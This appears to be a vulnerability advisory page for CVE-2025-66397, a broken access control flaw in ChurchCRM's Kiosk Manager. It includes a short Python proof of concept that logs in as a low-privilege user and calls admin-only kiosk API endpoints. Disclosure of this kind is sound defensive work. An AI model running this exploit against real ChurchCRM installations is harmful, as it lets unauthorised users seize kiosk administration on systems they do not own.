Security Vulnerability Report
CVE-2025-66397 CVSS 8.3 HIGH


Published: 2025-12-17 20:15:56
Last Modified: 2025-12-18 19:07:26

Description

ChurchCRM is an open-source church management system. Prior to version 6.5.3, the allowRegistration, acceptKiosk, reloadKiosk, and identifyKiosk functions in the Kiosk Manager feature suffer from broken access control, allowing any authenticated user to allow and accept kiosk registrations and to perform other Kiosk Manager actions such as reload and identify. Version 6.5.3 fixes the issue.

CVSS Details

CVSS Score
8.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:* - VULNERABLE
ChurchCRM < 6.5.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-66397 PoC - ChurchCRM Kiosk Manager Broken Access Control
# Affected versions: ChurchCRM < 6.5.3
import requests

TARGET_URL = "http://target-churchcrm.com"
USERNAME = "attacker"
PASSWORD = "password123"

session = requests.Session()

# Step 1: Login as low-privilege user
login_url = f"{TARGET_URL}/session/login"
login_data = {"UserName": USERNAME, "Password": PASSWORD}
response = session.post(login_url, data=login_data)
print(f"Login status: {response.status_code}")

# Step 2: Enable Kiosk Registration (requires only authenticated user)
enable_kiosk_url = f"{TARGET_URL}/api/kiosk/allowRegistration"
response = session.post(enable_kiosk_url, json={"enable": True})
print(f"Enable Kiosk Registration: {response.status_code}")
print(f"Response: {response.text}")

# Step 3: Accept Kiosk (admin-only function)
accept_kiosk_url = f"{TARGET_URL}/api/kiosk/acceptKiosk"
response = session.post(accept_kiosk_url, json={"kioskId": 1})
print(f"Accept Kiosk: {response.status_code}")

# Step 4: Reload Kiosk (admin-only function)
reload_kiosk_url = f"{TARGET_URL}/api/kiosk/reloadKiosk"
response = session.post(reload_kiosk_url, json={"kioskId": 1})
print(f"Reload Kiosk: {response.status_code}")

# Step 5: Identify Kiosk (admin-only function)
identify_kiosk_url = f"{TARGET_URL}/api/kiosk/identifyKiosk"
response = session.post(identify_kiosk_url, json={"kioskId": 1})
print(f"Identify Kiosk: {response.status_code}")

print("\n[!] If all requests returned 200 OK, the vulnerability is confirmed!")
```

References

https://github.com/ChurchCRM/CRM/security/advisories/GHSA-32vr-ch3p-wmr5 (Vendor Advisory, Exploit)

Weakness: CWE-284 (Improper Access Control)